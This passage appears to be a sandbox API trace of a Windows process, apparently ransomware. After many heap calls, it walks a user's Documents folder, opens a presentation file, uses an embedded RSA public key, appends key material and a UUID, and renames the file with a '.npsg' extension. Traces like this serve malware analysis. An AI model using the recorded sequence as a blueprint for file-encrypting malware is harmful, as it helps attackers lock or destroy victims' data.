dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0246.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0246.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0246.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0246.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.388] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o6M1E\\") returned="o6M1E\\" [0246.388] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\") returned="ma0LRjiKCyKK4\\" [0246.388] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\") returned="gTnYqN V h\\" [0246.388] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\") returned="ZLJLwY4 p8u\\" [0246.388] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\") returned="Ji_heo\\" [0246.388] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0246.388] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.388] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.389] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.389] PathFindFileNameW (pszPath="") returned="" [0246.389] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o6M1E\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fc883d0, ftCreationTime.dwHighDateTime=0x1d5b6df, ftLastAccessTime.dwLowDateTime=0x7ed68b80, ftLastAccessTime.dwHighDateTime=0x1d5c5c0, ftLastWriteTime.dwLowDateTime=0x7ed68b80, ftLastWriteTime.dwHighDateTime=0x1d5c5c0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.392] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fc883d0, ftCreationTime.dwHighDateTime=0x1d5b6df, ftLastAccessTime.dwLowDateTime=0x7ed68b80, ftLastAccessTime.dwHighDateTime=0x1d5c5c0, ftLastWriteTime.dwLowDateTime=0x7ed68b80, ftLastWriteTime.dwHighDateTime=0x1d5c5c0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.392] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6211c00, ftCreationTime.dwHighDateTime=0x1d5b71f, ftLastAccessTime.dwLowDateTime=0x71dea970, ftLastAccessTime.dwHighDateTime=0x1d5bce8, ftLastWriteTime.dwLowDateTime=0x71dea970, ftLastWriteTime.dwHighDateTime=0x1d5bce8, nFileSizeHigh=0x0, nFileSizeLow=0x4ea0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bLqiSxd8ZQsIitsH.odp", cAlternateFileName="BLQISX~1.ODP")) returned 1 [0246.392] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o6M1E\\bLqiSxd8ZQsIitsH.odp") returned=".odp" [0246.392] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o6M1E\\bLqiSxd8ZQsIitsH.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\o6m1e\\blqisxd8zqsiitsh.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0246.394] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=20128) returned 1 [0246.394] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0246.397] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x4e7a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.397] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0246.407] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x4ea0, lpOverlapped=0x0) returned 1 [0246.415] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.415] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.415] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.415] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a110) returned 1 [0246.417] CryptCreateHash (in: hProv=0x67a110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0246.417] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0246.417] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0246.417] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0246.417] GetLastError () returned 0x0 [0246.417] CryptDestroyHash (hHash=0x33f0488) returned 1 [0246.417] CryptReleaseContext (hProv=0x67a110, dwFlags=0x0) returned 1 [0246.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.417] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0246.417] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0246.417] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0246.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.427] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7b830, Size=0x218) returned 0x3b90a38 [0246.428] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x4ea0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.464] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0246.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0246.465] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0246.465] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0246.465] CloseHandle (hObject=0x644) returned 1 [0246.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8c8b0 [0246.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8f0) returned 0x3b8ccd0 [0246.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8c8b0 | out: hHeap=0x620000) returned 1 [0246.468] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o6M1E\\bLqiSxd8ZQsIitsH.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\o6m1e\\blqisxd8zqsiitsh.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o6M1E\\bLqiSxd8ZQsIitsH.odp.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\o6m1e\\blqisxd8zqsiitsh.odp.npsg")) returned 1 [0246.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 